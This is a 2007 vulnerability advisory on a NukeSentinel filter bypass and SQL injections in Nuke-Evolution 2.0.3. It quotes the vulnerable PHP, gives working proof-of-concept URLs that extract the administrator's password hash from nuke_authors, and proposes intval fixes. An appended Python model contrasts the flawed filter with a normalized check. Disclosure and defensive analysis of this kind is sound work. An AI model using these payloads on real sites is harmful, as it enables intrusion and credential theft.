SECURITYVULNS:DOC:16798
Apr 20, 2007 - 12:00 a.m.

NukeSentinel Bypass SQL Injection & Nuke Evolution <= 2.0.3 SQL Injections

2007-04-20 00:00:00
vulners.com

PROGRAM: Nuke-Evolution & NukeSentinel
HOMEPAGE: http://www.nuke-evolution.com/
VERSION: All versions
BUG 1: NukeSentinel Bypass SQL Injection Protection
BUG 2: Nuke Evolution <= 2.0.3 SQL Injections vulnerabilities
AUTHOR: Aleksandar

NukeSentinel Bypass SQL Injection Protection

nukesentinel.php, lines 270-290


// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
// The '%20union%20' needle shows that matching runs on the still URL-encoded
// query string, so an encoded comment such as %2f**%2f is never seen as /**/
// by either of the two checks below.
$blocker_row = $blocker_array[1];
if($blocker_row['activate'] > 0) {
    if (stristr($nsnst_const['query_string'],'+union+') OR
        stristr($nsnst_const['query_string'],'%20union%20') OR
        stristr($nsnst_const['query_string'],'/union/') OR
        stristr($nsnst_const['query_string'],' union ') OR
        stristr($nsnst_const['query_string_base64'],'+union+') OR
        stristr($nsnst_const['query_string_base64'],'%20union%20') OR
        stristr($nsnst_const['query_string_base64'],'/union/') OR
        stristr($nsnst_const['query_string_base64'],' union ')) {
        // block_ip($blocker_row);
        die("BLOCK IP 1 " );
    }
}

// Check for CLIKE attack (C-style comment markers /* and */)
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[2];
if($blocker_row['activate'] > 0) {
    if (stristr($nsnst_const['query_string'],'/*') OR
        stristr($nsnst_const['query_string_base64'],'/*') OR
        stristr($nsnst_const['query_string'],'*/') OR
        stristr($nsnst_const['query_string_base64'],'*/')) {
        // block_ip($blocker_row);
        die("BLOCK IP 2 " );
    }
}


Example (bypass of the SQL injection protection):

PHPNuke + NukeSentinel
http://localhost/php-nuke/?%2f**%2fUNION%2f**%2fSELECT … etc

Nuke-Evolution + NukeSentinel
http://localhost/nuke-evolution/?%2f**%2fUNION%2f**%2fSELECT … etc

Nuke-Evolution Basic 2.0.3

An open source content management system featuring customizable blocks, modules, multi-language support and themes, with an emphasis on security, speed and usability.
A PHP-Nuke based CMS with added security, functionality, and core improvements.

Site: http://www.nuke-evolution.com/

Your_Account/index.php

Vulnerability code:


case "userinfo":
    //include("modules/$module_name/public/userinfo.php");

/*[BEGIN]*************************************
[ Mod: YA Merge v1.0.0 ]
*****/
    // The "$username" variable isn't filtered!!!
    $result = $db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$username'");
    $uid = $db->sql_fetchrow($result);
    Header("Location: modules.php?name=Profile&mode=viewprofile&u=".$uid[0]);
    die();
/*[END]***************************************
[ Mod: YA Merge v1.0.0 ]
******************************************************/
break;


PoC Exploit:
http://localhost/nukeNE/modules.php?name=Your_Account&op=userinfo&username=1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1'%2f**

Results:
Mozilla Firefox
URL BAR/ADDRESS BAR: http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH

Mozilla Firefox
Live HTTP Headers - Firefox Add-ons

http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH
GET /nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate

News/read_article.php, line 66

Vulnerability code:
++++++++++++++++++++++++++++++++++
// The "$sid" variable isn't filtered!!!
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";
$result = $db->sql_query($sql);

++++++++++++++++++++++++++++++++++

PoC Exploit:
http://localhost:8080/htmlNE/modules.php?name=News&file=read_article&sid=-1'%2f**%2fUNION%2f**%2fSELECT%201,1,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper='1'%2f**

FIX
++++++++++++++++++++++++++++++++++
$sid= intval($sid); // FIX
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";
$result = $db->sql_query($sql);

++++++++++++++++++++++++++++++++++

Donate/index.php, lines 33 & 46
Vulnerability code:


    // Line 33: the cast is only applied when the value is already numeric,
    // so a non-numeric $uid passes through untouched
    if (is_numeric($uid)) { // LOL :)
            $uid = intval($uid);  // :) LOL
    }


// Line 46

    } elseif (!empty($uid)) {
            include_once(NUKE_BASE_DIR.'header.php');
            $sql = "SELECT username FROM ".$user_prefix."_users where user_id='$uid'"; // BOOM -> SQL injection
            $result = $db->sql_query($sql);
            $row = $db->sql_fetchrow($result);
            $name = $row['username'];

PoC Exploit:
http://localhost:8080/htmlNE/modules.php?name=Donate&op=received&uid=-1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1

FIX

++++++++++++++++++++++++++++++++++++++

    ///if (is_numeric($uid)) {  REMOVE THIS LINE
            $uid = intval($uid);
    ///} REMOVE THIS LINE

++++++++++++++++++++++++++++++++++++++
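The following Python model is an added example, not code from this advisory or from NukeSentinel/Nuke-Evolution. It re-implements the two quoted NukeSentinel signature checks and the Donate/index.php is_numeric guard, runs them over the advisory's own bypass string, and contrasts them with a decode-then-normalize check and with the unconditional intval() fix. The is_numeric()/intval() emulation is an approximation of PHP's behaviour, and the sample query strings are constructed.

```python
import re
from urllib.parse import unquote

# Constructed samples. QUERY_STRING reaches the checks still URL-encoded,
# so the advisory's bypass contains "%2f**%2f", not "/**/".
BYPASS_QS = "%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors"
PLAIN_QS = "+union+select+pwd+from+nuke_authors"

UNION_NEEDLES = ("+union+", "%20union%20", "/union/", " union ")

def nukesentinel_union_check(raw_qs: str) -> bool:
    """Mirror of the quoted UNION signature: case-insensitive substring
    search on the raw query string. True means the request would be blocked."""
    hay = raw_qs.lower()
    return any(needle in hay for needle in UNION_NEEDLES)

def nukesentinel_clike_check(raw_qs: str) -> bool:
    """Mirror of the CLIKE signature: literal '/*' or '*/' in the raw string."""
    return "/*" in raw_qs or "*/" in raw_qs

def normalized_union_check(raw_qs: str) -> bool:
    """Defensive variant: decode first, blank out C-style comments, collapse
    whitespace, then match UNION [ALL] SELECT on word boundaries."""
    decoded = unquote(raw_qs.replace("+", " "))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    decoded = re.sub(r"\s+", " ", decoded)
    return re.search(r"\bunion\s+(all\s+)?select\b", decoded, re.I) is not None

def php_intval(value: str) -> int:
    """Approximation of PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0

def donate_uid_original(raw_uid: str) -> str:
    """Line 33 as quoted: intval() runs only when is_numeric() already holds
    (approximated here), so a non-numeric payload is returned untouched."""
    if re.fullmatch(r"\s*[+-]?\d+(\.\d+)?", raw_uid):
        return str(php_intval(raw_uid))
    return raw_uid

def donate_uid_fixed(raw_uid: str) -> str:
    """The advisory's fix: cast unconditionally, so only an integer reaches SQL."""
    return str(php_intval(raw_uid))
```

Signature matching on the encoded string is what lets the comment-separated payload through; the lasting fix is the type cast (or a parameterized query), with normalized matching only as a secondary detection layer.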

Best Regards
Aleksandar
Programmer and Web Developer